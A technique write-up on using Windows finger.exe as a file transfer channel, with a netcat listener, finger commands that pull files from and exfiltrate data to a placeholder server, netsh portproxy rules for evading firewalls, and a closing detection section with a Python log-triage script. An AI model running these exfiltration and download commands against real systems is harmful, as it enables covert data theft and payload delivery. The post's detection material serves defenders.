Using finger.exe to Transfer Files

finger.exe can be abused to transfer data to and from hosts. Finger is an old protocol which does not seem to get used much anymore. For reasons unknown to me, Windows supplies a finger client.

The Finger protocol is defined in RFC 1288.

Receiving data

First you will need to set up a makeshift finger server to serve a file. I did this with a sleazy while loop and netcat:

while [ 1 ]; do nc -q 0 -nlvp 79 < FILENAME_GOES_HERE; done

Next, on Windows, you can download this with finger.exe in PowerShell:

finger @YOUR_FINGER_SERVER|Select -Skip 2 > outfile.txt

or cmd.exe:

finger @YOUR_FINGER_SERVER |more +2 >out.txt

This technique could easily be used to serve code to pipe into cmd.exe or PowerShell.

Sending Data

Specifying a user with finger.exe allows you to exfiltrate data several bytes at a time. In my tests on Windows 10, I was able to send a little over 8000 bytes at a time.

Writing a script to chunk and encode a file, and send it to a server would not be too hard to do. Here is a quick proof of concept:

On the server:

touch empty
while [ 1 ]; do nc -q 0 -nlvp 79 < empty >> outfile; done

From Windows host:

finger "a string here"@YOUR_FINGER_SERVER
finger lotsofbyteshere@YOUR_FINGER_SERVER
finger part1000of1000@YOUR_FINGER_SERVER

After you are done sending data, hit Control-C to kill the netcat listener loop, and outfile will contain everything received while the loop was running.

DarkFinger-C2 is a more polished example of this technique, which I discovered while writing this post.

Dealing with Firewalls

finger.exe uses TCP port 79, which may be blocked. You can get around this with netsh portproxy and by changing the port your finger server listens on. In this example, we have changed it to 8080:

netsh interface portproxy add v4tov4 listenaddress= listenport=79 connectaddress=YOUR_FINGER_SERVER_IP connectport=8080

netsh interface portproxy add v4tov4 listenaddress= listenport=8080 connectaddress= connectport=79

Now, you can finger localhost and the traffic is relayed to your server on port 8080:

finger "exfil data here"@

When you are done, remove the netsh rules:

netsh interface portproxy delete v4tov4 listenport=79 listenaddress=
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=

Detection and Prevention

Here are some ideas of how to detect and prevent this technique:

  • Restrict traffic for TCP port 79.
  • Monitor for use of finger.exe.
  • Presence of C:\Windows\Prefetch\finger*.pf indicates that finger.exe has executed on a host.
  • Restrict who is allowed to execute finger.exe, or consider removing it if you are not using it.
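As an added example (not from the original post), here is a small Python triage script that applies the "monitor for use of finger.exe" idea to process-creation records. The record format, the sample lines and the 203.0.113.10 host are constructed for the example; it rates every finger.exe execution as at least "info" and raises to "high" the three argument shapes this post describes: an empty user (whole-server query used for download), a user field that is not a plausible username (chunked exfil), and a loopback target (the portproxy relay).

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample process-creation records (image|command line), the shape a
# SIEM export of Sysmon Event ID 1 / Security 4688 might take. Not real telemetry.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\finger.exe|finger @203.0.113.10",
    r'C:\Windows\System32\finger.exe|finger "a string here"@203.0.113.10',
    r"C:\Windows\System32\finger.exe|finger part1000of1000@203.0.113.10",
    r"C:\Windows\System32\finger.exe|finger aGVsbG8gd29ybGQgdGhpcyBpcyBhIGxvbmcgY2h1bmsK@203.0.113.10",
    r'C:\Windows\System32\finger.exe|finger "exfil data here"@localhost',
    r"C:\Windows\System32\finger.exe|finger alice@bsd.example.org",
    r"C:\Windows\System32\cmd.exe|cmd /c dir",
]

# finger [user]@host, where user may be quoted (and so may contain spaces).
FINGER_RE = re.compile(
    r'^\s*finger(?:\.exe)?\s+(?:"(?P<quser>[^"]*)"|(?P<user>[^@\s]*))@(?P<host>\S*)', re.I)
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")  # what a real finger target looks like
LOOPBACK = {"", "localhost", "127.0.0.1", "::1"}   # empty host = finger @ with nothing after

@dataclass
class Finding:
    cmdline: str
    severity: str   # "info" = finger.exe ran at all, "high" = file-transfer pattern
    reason: str

def classify_finger(cmdline: str) -> Finding:
    """Rate one finger.exe command line; every execution is at least 'info'."""
    m = FINGER_RE.match(cmdline)
    if not m:
        return Finding(cmdline, "info", "finger.exe executed (arguments not parsed)")
    user = m.group("quser") if m.group("quser") is not None else m.group("user")
    host = m.group("host")
    if host.lower() in LOOPBACK:
        return Finding(cmdline, "high", "target is loopback: portproxy relay pattern")
    if user == "":
        return Finding(cmdline, "high", "no user: whole-server query, download pattern")
    if not USERNAME_RE.fullmatch(user):
        return Finding(cmdline, "high", "user field is not a plausible username: exfil pattern")
    return Finding(cmdline, "info", "finger.exe executed with an ordinary user@host query")

def scan(events: List[str]) -> List[Finding]:
    """Classify every record whose image is finger.exe; other images are ignored."""
    out = []
    for rec in events:
        image, _, cmdline = rec.partition("|")
        if image.lower().endswith("finger.exe"):
            out.append(classify_finger(cmdline))
    return out

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.severity.upper(), f.reason, "::", f.cmdline)
```

Note that a short alphanumeric chunk such as part1000of1000 passes the username heuristic and is only rated "info", which is why the baseline alert on any finger.exe execution matters more than the pattern rules.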
